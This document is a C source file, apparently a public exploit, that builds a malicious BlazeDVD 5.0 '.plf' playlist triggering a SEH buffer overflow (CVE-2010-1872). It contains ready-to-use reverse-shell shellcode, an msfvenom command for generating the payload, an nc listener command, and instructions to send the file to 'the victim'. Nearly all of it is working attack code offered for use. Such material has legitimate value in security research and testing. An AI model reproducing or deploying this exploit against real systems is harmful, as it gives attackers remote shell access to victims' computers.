/*
    BlazeDVD 5.0 - '.PLF' Playlist SEH Buffer Overflow Exploit (CVE-2010-1872)
    Author: LIpeOzyy
    Description:
        This exploit generates a malicious .plf file that triggers a SEH-based buffer overflow
        when opened with BlazeDVD 5.0. Upon successful exploitation, it spawns a reverse shell.

    Usage:
        1. Generate your shellcode using msfvenom:
           msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=8443 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
        2. Replace the shellcode below with your own payload if needed.
        3. Compile the code:
           gcc exploit.c -o exploit
        4. Run the exploit:
           ./exploit
        5. Transfer 'seh_final.plf' to the victim and open with BlazeDVD.

        Listener:
           nc -lvnp 8443
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main() {
    FILE *arq;
    const char *file = "seh_final.plf";

    // Short jump over the SEH handler (NOP NOP JMP SHORT)
    char jump_short[] = "\x90\x90\xeb\x04";

    // POP POP RET (safe module) - must be adjusted for your system if needed
    char seh[] = { 0x51, 0xAA, 0x33, 0x60 };

    // NOP sled before shellcode
    char nops[20];
    memset(nops, 0x90, sizeof(nops));

    // Reverse shell payload generated with msfvenom (LHOST and LPORT should be set by the user)
    unsigned char shellcode[] = 
    "\xd9\xf7\xbb\xbb\x8f\xb9\xda\xd9\x74\x24\xf4\x5f\x29\xc9"
    "\xb1\x52\x31\x5f\x17\x83\xc7\x04\x03\xe4\x9c\x5b\x2f\xe6"
    "\x4b\x19\xd0\x16\x8c\x7e\x58\xf3\xbd\xbe\x3e\x70\xed\x0e"
    "\x34\xd4\x02\xe4\x18\xcc\x91\x88\xb4\xe3\x12\x26\xe3\xca"
    "\xa3\x1b\xd7\x4d\x20\x66\x04\xad\x19\xa9\x59\xac\x5e\xd4"
    "\x90\xfc\x37\x92\x07\x10\x33\xee\x9b\x9b\x0f\xfe\x9b\x78"
    "\xc7\x01\x8d\x2f\x53\x58\x0d\xce\xb0\xd0\x04\xc8\xd5\xdd"
    "\xdf\x63\x2d\xa9\xe1\xa5\x7f\x52\x4d\x88\x4f\xa1\x8f\xcd"
    "\x68\x5a\xfa\x27\x8b\xe7\xfd\xfc\xf1\x33\x8b\xe6\x52\xb7"
    "\x2b\xc2\x63\x14\xad\x81\x68\xd1\xb9\xcd\x6c\xe4\x6e\x66"
    "\x88\x6d\x91\xa8\x18\x35\xb6\x6c\x40\xed\xd7\x35\x2c\x40"
    "\xe7\x25\x8f\x3d\x4d\x2e\x22\x29\xfc\x6d\x2b\x9e\xcd\x8d"
    "\xab\x88\x46\xfe\x99\x17\xfd\x68\x92\xd0\xdb\x6f\xd5\xca"
    "\x9c\xff\x28\xf5\xdc\xd6\xee\xa1\x8c\x40\xc6\xc9\x46\x90"
    "\xe7\x1f\xc8\xc0\x47\xf0\xa9\xb0\x27\xa0\x41\xda\xa7\x9f"
    "\x72\xe5\x6d\x88\x19\x1c\xe6\x77\x75\x1b\xe6\x1f\x84\x23"
    "\x26\x1b\x01\xc5\x4c\xcb\x44\x5e\xf9\x72\xcd\x14\x98\x7b"
    "\xdb\x51\x9a\xf0\xe8\xa6\x55\xf1\x85\xb4\x02\xf1\xd3\xe6"
    "\x85\x0e\xce\x8e\x4a\x9c\x95\x4e\x04\xbd\x01\x19\x41\x73"
    "\x58\xcf\x7f\x2a\xf2\xed\x7d\xaa\x3d\xb5\x59\x0f\xc3\x34"
    "\x2f\x2b\xe7\x26\xe9\xb4\xa3\x12\xa5\xe2\x7d\xcc\x03\x5d"
    "\xcc\xa6\xdd\x32\x86\x2e\x9b\x78\x19\x28\xa4\x54\xef\xd4"
    "\x15\x01\xb6\xeb\x9a\xc5\x3e\x94\xc6\x75\xc0\x4f\x43\x85"
    "\x8b\xcd\xe2\x0e\x52\x84\xb6\x52\x65\x73\xf4\x6a\xe6\x71"
    "\x85\x88\xf6\xf0\x80\xd5\xb0\xe9\xf8\x46\x55\x0d\xae\x67"
    "\x7c";

    // Build the malicious buffer
    char buffer[3000];
    memset(buffer, 'A', 608);                         // Filler until SEH
    memcpy(buffer + 608, jump_short, 4);              // Next SEH
    memcpy(buffer + 612, seh, 4);                     // SEH overwrite (POP POP RET)
    memcpy(buffer + 616, nops, sizeof(nops));         // NOP sled
    memcpy(buffer + 616 + sizeof(nops), shellcode, sizeof(shellcode) - 1); // Shellcode

    // Write the payload to the file
    arq = fopen(file, "wb");
    if (arq == NULL) {
        perror("Error opening file");
        return 1;
    }

    fwrite(buffer, 1, 616 + sizeof(nops) + sizeof(shellcode) - 1, arq);
    fclose(arq);

    printf("[+] Exploit file '%s' created successfully!\n", file);
    return 0;
}